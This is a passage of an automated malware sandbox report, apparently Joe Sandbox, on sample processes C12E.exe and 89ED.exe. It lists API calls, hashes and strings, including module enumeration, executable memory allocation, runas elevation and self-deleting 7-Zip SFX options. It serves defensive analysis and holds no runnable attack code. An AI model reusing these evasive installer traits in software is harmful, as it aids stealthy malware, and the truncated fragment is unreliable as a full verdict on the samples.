Instruction Fuzzy Hash: C331285095C380D9E301CBB8FC047853F61AB39708F04C1A89658873B5D7BE9A69D7AE

Function 007906F8 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00790720
Module32First.KERNEL32(00000000,00000224), ref: 00790740

Memory Dump Source

Source File: 00000006.00000002.2399489660.000000000078D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0078D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_78d000_C12E.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 7893cea5cab22b21ca84268ee5d3752962a7d2e24b511fa50eabd763e6895f4f
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: EAF06D32210714AFEF603AF9B88DA6A76E8AF49734F100528E646914C0DB78FC458AA1

Function 02160E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02160223,?,?), ref: 02160E19
SetErrorMode.KERNELBASE(00000000,?,?,02160223,?,?), ref: 02160E1E

Memory Dump Source

Source File: 00000006.00000002.2399579094.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2160000_C12E.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: e9c0ddff7ad8c06008852dff5cd4673f15b5d7d0f17db3ceebe3952d7cf3b5ad
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 53D0123154512877D7002AD4DC0DBDD7B1CDF09B66F108011FB0DD9080C770954046E5

Function 00401991 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C12E.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

Function 004019A9 Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C12E.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

Function 004019AF Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C12E.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

Function 004019B8 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C12E.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B

Function 007903B7 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00790408

Memory Dump Source

Source File: 00000006.00000002.2399489660.000000000078D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0078D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_78d000_C12E.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: a8e614beb991ba9f0098511ed0293267299951bc67b34537aa3ae56693e866fc
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: E5113C79A00208EFDB01DF98C989E98BBF5AF08350F058094FA489B362D375EA50DF80

Function 00416BA0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,00512CE4,004171C7), ref: 00416BA8

Memory Dump Source

Source File: 00000006.00000002.2399225026.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_C12E.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: e1827eadc6904b053cd6145474e92f434bb3982baf1d8af9391b437b8e0fcf11
Instruction ID: 615a9cd2e73dd742d4f8b12f5f73b1ecb849c910c1908f7c89a030002a05c084
Opcode Fuzzy Hash: e1827eadc6904b053cd6145474e92f434bb3982baf1d8af9391b437b8e0fcf11
Instruction Fuzzy Hash: A7B092B0144200ABD3418FB0AD44B943BA4E318302F028115F600811A0CA201818AF14

Non-executed Functions

Function 00416E20 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00416E54
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00416E6F
HeapDestroy.KERNEL32(00000000), ref: 00416E8E
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00416E9D

Memory Dump Source

Source File: 00000006.00000002.2399225026.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_C12E.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: 0558a7fda510a8728fa0bbbce70783a7ac2517ddce2569006a515f8f95c0a596
Instruction ID: 37e889f167100b587a02f92b955e498922163858d7d7aab38356b1d4f56091a8
Opcode Fuzzy Hash: 0558a7fda510a8728fa0bbbce70783a7ac2517ddce2569006a515f8f95c0a596
Instruction Fuzzy Hash: 3401D474640308ABC760EB64EC45BDA7BB8E71C319F01416AF70997290DE349D88CBA9

Analysis Process: 89ED.exePID: 7988, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	33.8%
Total number of Nodes:	1016
Total number of Limit Nodes:	18

Executed Functions

Function 0000000140007830 Relevance: 232.9, APIs: 92, Strings: 40, Instructions: 1885windowCOMMON

Download Yara Rule

APIs

?_set_new_handler@@YAP6AH_K@ZP6AH0@Z@Z.MSVCRT ref: 0000000140007856

Part of subcall function 0000000140002118: GetModuleHandleW.KERNEL32 ref: 0000000140002123
Part of subcall function 0000000140002118: CreateWindowExW.USER32 ref: 000000014000216D
Part of subcall function 0000000140002118: SetTimer.USER32 ref: 0000000140002188
Part of subcall function 0000000140002118: GetMessageW.USER32 ref: 000000014000219B
Part of subcall function 0000000140002118: DispatchMessageW.USER32 ref: 00000001400021A6
Part of subcall function 0000000140002118: KillTimer.USER32 ref: 00000001400021B4
Part of subcall function 0000000140002118: DestroyWindow.USER32 ref: 00000001400021BD

GetVersionExW.KERNEL32 ref: 0000000140007874
MessageBoxA.USER32 ref: 00000001400099CF

Part of subcall function 0000000140001190: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
Part of subcall function 0000000140001190: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8

GetCommandLineW.KERNEL32 ref: 00000001400079A9

Part of subcall function 00000001400037A4: ??3@YAXPEAX@Z.MSVCRT ref: 00000001400038E1
Part of subcall function 00000001400037A4: ??3@YAXPEAX@Z.MSVCRT ref: 0000000140003900
Part of subcall function 00000001400037A4: ??3@YAXPEAX@Z.MSVCRT ref: 0000000140003908

Part of subcall function 0000000140005BB0: lstrlenW.KERNEL32 ref: 0000000140005BEC
Part of subcall function 0000000140005BB0: lstrlenW.KERNEL32 ref: 0000000140005BF8

_wtol.MSVCRT ref: 0000000140007A06
GetModuleFileNameW.KERNEL32 ref: 0000000140007AE7
_wtol.MSVCRT ref: 0000000140007C3F
??2@YAPEAX_K@Z.MSVCRT ref: 0000000140007F40
??3@YAXPEAX@Z.MSVCRT ref: 0000000140008005
??3@YAXPEAX@Z.MSVCRT ref: 00000001400096DB
??3@YAXPEAX@Z.MSVCRT ref: 0000000140009711
??3@YAXPEAX@Z.MSVCRT ref: 000000014000971E
??3@YAXPEAX@Z.MSVCRT ref: 0000000140009732
??3@YAXPEAX@Z.MSVCRT ref: 000000014000973F
??3@YAXPEAX@Z.MSVCRT ref: 000000014000974C
??3@YAXPEAX@Z.MSVCRT ref: 0000000140009754
SetCurrentDirectoryW.KERNEL32 ref: 00000001400097A2
??3@YAXPEAX@Z.MSVCRT ref: 00000001400097EB
??3@YAXPEAX@Z.MSVCRT ref: 0000000140009948
??3@YAXPEAX@Z.MSVCRT ref: 0000000140009952
??3@YAXPEAX@Z.MSVCRT ref: 000000014000996D
??3@YAXPEAX@Z.MSVCRT ref: 00000001400099A3
??3@YAXPEAX@Z.MSVCRT ref: 00000001400099B0

Strings

GUIMode, xrefs: 0000000140008338
InstallPath, xrefs: 00000001400089B9
bpt, xrefs: 0000000140008436
sfxlang, xrefs: 00000001400079E4
ExecuteParameters, xrefs: 000000014000937F
nowait, xrefs: 0000000140009153
sfxconfig, xrefs: 0000000140007CA9, 000000014000802B
sfxtest, xrefs: 0000000140007B31
sfxversion, xrefs: 0000000140007A4C
SetEnvironment, xrefs: 0000000140008722, 00000001400088B7
" -, xrefs: 00000001400085A4
i386, xrefs: 0000000140009294
x64, xrefs: 00000001400092F4
amd64, xrefs: 00000001400092CC
waitall, xrefs: 000000014000904D
SelfDelete, xrefs: 00000001400083C2, 00000001400098BD
BeginPrompt, xrefs: 0000000140008A6A
GUIFlags, xrefs: 000000014000835D
AutoInstall, xrefs: 0000000140008AFA, 0000000140008B68, 00000001400090CD
shc, xrefs: 0000000140009200
BeginPromptTimeout, xrefs: 000000014000844F, 00000001400089EF
ExecuteFile, xrefs: 0000000140008B98, 0000000140008BB4
sfxwaitall, xrefs: 0000000140007A6A
FinishMessage, xrefs: 000000014000981C
Delete, xrefs: 00000001400097AF
Sorry, this program requires Microsoft Windows 2000 or later., xrefs: 00000001400099C0
RunProgram, xrefs: 0000000140008BD0, 0000000140008BEC
7-Zip SFX, xrefs: 00000001400099B9
7ZipSfx.%03x, xrefs: 0000000140008CC6
7zSfxString%d, xrefs: 0000000140008118
setup.exe, xrefs: 0000000140008F76, 0000000140008F82
x86, xrefs: 000000014000926C
del, xrefs: 0000000140009233
HelpText, xrefs: 0000000140008915
MiscFlags, xrefs: 0000000140008382
OverwriteMode, xrefs: 00000001400082F4
Shortcut, xrefs: 0000000140009779
hidcon, xrefs: 0000000140009120
sfxelevation, xrefs: 0000000140007A8D, 00000001400085BB
forcenowait, xrefs: 000000014000918D

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@$Message$??2@ModuleTimerWindow_wtollstrlen$?_set_new_handler@@CommandCreateCurrentDestroyDirectoryDispatchFileHandleKillLineNameVersion
String ID: " -$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxtest$sfxversion$sfxwaitall$shc$waitall$x64$x86
API String ID: 3822079563-355865012
Opcode ID: 46ef39cd969ba5976e53c0cb014ec25a8db5c7cebc9a4efc430a62a2924277de
Instruction ID: 364cff9facd6a1ef06d97274886931cfaf483fd8fdce9875c59425905054aa79
Opcode Fuzzy Hash: 46ef39cd969ba5976e53c0cb014ec25a8db5c7cebc9a4efc430a62a2924277de
Instruction Fuzzy Hash: 7C135CB1604A8181EA73EB27F4517EA63A1F79D7C0F90801AFB8947AB6DF78C945C701

Function 0000000140006C88 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140001190: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
Part of subcall function 0000000140001190: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8

??3@YAXPEAX@Z.MSVCRT ref: 0000000140006D5E
ShellExecuteExW.SHELL32 ref: 0000000140006D83
WaitForSingleObject.KERNEL32 ref: 0000000140006D9E
CloseHandle.KERNEL32 ref: 0000000140006DAC
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006DB9
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006DC1

Strings

runas, xrefs: 0000000140006D22

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@$??2@CloseExecuteHandleObjectShellSingleWait
String ID: runas
API String ID: 228040680-4000483414
Opcode ID: 3a731313788833f03691b278ac7bbe15aae248554c4f3e2b317822e48f60b639
Instruction ID: 4df89d2247086e423a1a2ca1871fb215b82d858b141f0f69976dc0afbb36e867
Opcode Fuzzy Hash: 3a731313788833f03691b278ac7bbe15aae248554c4f3e2b317822e48f60b639
Instruction Fuzzy Hash: 0B415A72A18B8086E721DF12F0543AAB3A5F7D8BD0F544125FB8947AAACF7CC905CB40

Function 00000001400029DC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 15
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 00000001400029E7
GetProcAddress.KERNEL32 ref: 00000001400029F7
GetNativeSystemInfo.KERNELBASE ref: 0000000140002A07

Strings

kernel32, xrefs: 00000001400029E0
GetNativeSystemInfo, xrefs: 00000001400029ED

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: AddressInfoLibraryLoadNativeProcSystem
String ID: GetNativeSystemInfo$kernel32
API String ID: 2103483237-3846845290
Opcode ID: 848c9ad2a0d3476315f745f577a2e496412854036ef6c8f000bb78e7d03b0a2a
Instruction ID: 65ca20d525106fe96000ab002afe0e89e6d5026d20aa0b8d59282c99e5b88f06
Opcode Fuzzy Hash: 848c9ad2a0d3476315f745f577a2e496412854036ef6c8f000bb78e7d03b0a2a
Instruction Fuzzy Hash: 61E0EC70711941D2EB62DB92E8103E82361B7ECB90F900529B64E436B0EE3CCA9AC700

Function 0000000140002A50 Relevance: 4.5, APIs: 3, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 0000000140002AA5
CheckTokenMembership.KERNELBASE ref: 0000000140002AC2
FreeSid.ADVAPI32 ref: 0000000140002AD0

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 171a453e635968fb291f670e076b6eed2a7a82eb5d435e59b9e68e039cf5c816
Instruction ID: 04eb66c763905f339746e8f01cc633dd459bfeaff36aac37dec00845f41476e0
Opcode Fuzzy Hash: 171a453e635968fb291f670e076b6eed2a7a82eb5d435e59b9e68e039cf5c816
Instruction Fuzzy Hash: 171103B76096C0CBD7218F69E49478EBBA0F3A9784F94412AD78943715CB38C549CF15

Function 000000014000BE00 Relevance: 40.8, APIs: 27, Instructions: 269
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 000000014000BE3E
LoadIconW.USER32 ref: 000000014000BE4A
GetSystemMetrics.USER32 ref: 000000014000BE57
GetSystemMetrics.USER32 ref: 000000014000BE63
GetModuleHandleW.KERNEL32 ref: 000000014000BE6D
LoadImageW.USER32 ref: 000000014000BE88
SendMessageW.USER32 ref: 000000014000BEA8
SendMessageW.USER32 ref: 000000014000BEBA

Part of subcall function 000000014000AC40: GetDlgItem.USER32 ref: 000000014000AC5B
Part of subcall function 000000014000AC40: GetWindowTextLengthW.USER32 ref: 000000014000AC64
Part of subcall function 000000014000AC40: GetDlgItem.USER32 ref: 000000014000AC74
Part of subcall function 000000014000AC40: SetWindowTextW.USER32 ref: 000000014000AC83

Part of subcall function 0000000140009F84: GetDlgItem.USER32 ref: 0000000140009F97
Part of subcall function 0000000140009F84: ShowWindow.USER32 ref: 0000000140009FAC

Part of subcall function 0000000140009D74: GetDlgItem.USER32 ref: 0000000140009D92
Part of subcall function 0000000140009D74: SendMessageW.USER32 ref: 0000000140009DAB
Part of subcall function 0000000140009D74: GetDlgItem.USER32 ref: 0000000140009DBA
Part of subcall function 0000000140009D74: SendMessageW.USER32 ref: 0000000140009DCE
Part of subcall function 0000000140009D74: SendMessageW.USER32 ref: 0000000140009DE3
Part of subcall function 0000000140009D74: GetDlgItem.USER32 ref: 0000000140009DEF
Part of subcall function 0000000140009D74: SendMessageW.USER32 ref: 0000000140009E03
Part of subcall function 0000000140009D74: GetDlgItem.USER32 ref: 0000000140009E0F

Part of subcall function 000000014000585C: ??3@YAXPEAX@Z.MSVCRT ref: 00000001400058B7
Part of subcall function 000000014000585C: ??3@YAXPEAX@Z.MSVCRT ref: 00000001400058C1
Part of subcall function 000000014000585C: SetWindowTextW.USER32 ref: 00000001400058CE
Part of subcall function 000000014000585C: ??3@YAXPEAX@Z.MSVCRT ref: 00000001400058DB

GetDlgItem.USER32 ref: 000000014000BED9
GetDlgItem.USER32 ref: 000000014000BEEB
GetWindowLongPtrW.USER32 ref: 000000014000BEFE
SetWindowLongPtrW.USER32 ref: 000000014000BF11
GetDlgItem.USER32 ref: 000000014000BF22
GetDlgItem.USER32 ref: 000000014000BF31
GetWindowLongPtrW.USER32 ref: 000000014000BF3F
SetWindowLongPtrW.USER32 ref: 000000014000BF52
GetDlgItem.USER32 ref: 000000014000BF65
SetWindowTextW.USER32 ref: 000000014000BF74
GetWindow.USER32 ref: 000000014000C07F
GetWindow.USER32 ref: 000000014000C097
GetWindow.USER32 ref: 000000014000C0AB
GetWindow.USER32 ref: 000000014000C0D3
GetWindow.USER32 ref: 000000014000C0F6
GetModuleHandleW.KERNEL32 ref: 000000014000C15D
LoadIconW.USER32 ref: 000000014000C169
GetDlgItem.USER32 ref: 000000014000C184
SendMessageW.USER32 ref: 000000014000C198

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: Window$Item$MessageSend$LongText$??3@HandleLoadModule$IconMetricsSystem$ImageLengthShow
String ID:
API String ID: 1297775559-0
Opcode ID: af33e4ae92b9cf0d477982a91027c0ae8eeb5a30d2f2007967fa946254e04aef
Instruction ID: 5e48947b78fbad6608c468343bf2ef6fe47797e912f91301bce18406bc7bd85c
Opcode Fuzzy Hash: af33e4ae92b9cf0d477982a91027c0ae8eeb5a30d2f2007967fa946254e04aef
Instruction Fuzzy Hash: E4B14EB571164186FB56EB63F8147EA2292A7CDFD4F184429BF0A4BBA6CE3CC9458340

Function 0000000140004188 Relevance: 37.1, APIs: 19, Strings: 2, Instructions: 373
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002B70: ??2@YAPEAX_K@Z.MSVCRT ref: 0000000140002B8D
Part of subcall function 0000000140002B70: ??3@YAXPEAX@Z.MSVCRT ref: 0000000140002BBF

??3@YAXPEAX@Z.MSVCRT ref: 0000000140004716

Part of subcall function 0000000140001190: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
Part of subcall function 0000000140001190: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8

??3@YAXPEAX@Z.MSVCRT ref: 00000001400042F9
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004303
??3@YAXPEAX@Z.MSVCRT ref: 00000001400043A9
??3@YAXPEAX@Z.MSVCRT ref: 00000001400043B1
strncmp.MSVCRT ref: 0000000140004464
strncmp.MSVCRT ref: 000000014000448A
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004550
lstrcmpW.KERNEL32 ref: 000000014000456E
lstrlenW.KERNEL32 ref: 00000001400045A6
wcsncmp.MSVCRT ref: 00000001400045B5
??2@YAPEAX_K@Z.MSVCRT ref: 00000001400045D3
??2@YAPEAX_K@Z.MSVCRT ref: 000000014000464A
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004691
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004699
??3@YAXPEAX@Z.MSVCRT ref: 00000001400046DB
??3@YAXPEAX@Z.MSVCRT ref: 00000001400046F6
??3@YAXPEAX@Z.MSVCRT ref: 00000001400046FE
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004708

Strings

{\rtf, xrefs: 0000000140004453, 0000000140004479
SetEnvironment, xrefs: 0000000140004564

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@$??2@$strncmp$lstrcmplstrlenwcsncmp
String ID: SetEnvironment${\rtf
API String ID: 2284649278-318139784
Opcode ID: d3f0bae3b15ddb70ac41c41364de50817703f0d6b3af512f9fa55f4975e69db7
Instruction ID: 02f768bd035b1cdefbf6ba138714fc0b3efcafbbd2906dcd07267f19784650a6
Opcode Fuzzy Hash: d3f0bae3b15ddb70ac41c41364de50817703f0d6b3af512f9fa55f4975e69db7
Instruction Fuzzy Hash: 56F16DB2608A8086EB62DF17F4903EE67A5F789BC4F544016FB89077BADE39C445CB05

Function 000000014000A118 Relevance: 30.3, APIs: 20, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32 ref: 000000014000A155
GetWindowLongPtrW.USER32 ref: 000000014000A163
SetWindowPos.USER32 ref: 000000014000A344
GetDlgItem.USER32 ref: 000000014000A381
GetClientRect.USER32 ref: 000000014000A425
GetDlgItem.USER32 ref: 000000014000A471
GetDlgItem.USER32 ref: 000000014000A177

Part of subcall function 00000001400021CC: GetParent.USER32 ref: 00000001400021E1
Part of subcall function 00000001400021CC: GetWindowRect.USER32 ref: 00000001400021F5
Part of subcall function 00000001400021CC: ScreenToClient.USER32 ref: 0000000140002201
Part of subcall function 00000001400021CC: ScreenToClient.USER32 ref: 000000014000220E

GetDlgItem.USER32 ref: 000000014000A1BD
GetWindowLongPtrW.USER32 ref: 000000014000A1C8
GetDlgItem.USER32 ref: 000000014000A1DC
GetSystemMetrics.USER32 ref: 000000014000A257
GetSystemMetrics.USER32 ref: 000000014000A264
GetSystemMetrics.USER32 ref: 000000014000A271
GetSystemMetrics.USER32 ref: 000000014000A27F
GetParent.USER32 ref: 000000014000A2A5
GetClientRect.USER32 ref: 000000014000A2BB
ClientToScreen.USER32 ref: 000000014000A2C9
ClientToScreen.USER32 ref: 000000014000A2D7
GetSystemMetrics.USER32 ref: 000000014000A4DF
GetSystemMetrics.USER32 ref: 000000014000A4ED

Part of subcall function 000000014000A0B8: GetDlgItem.USER32 ref: 000000014000A0DB
Part of subcall function 000000014000A0B8: SetWindowPos.USER32 ref: 000000014000A100

Memory Dump Source

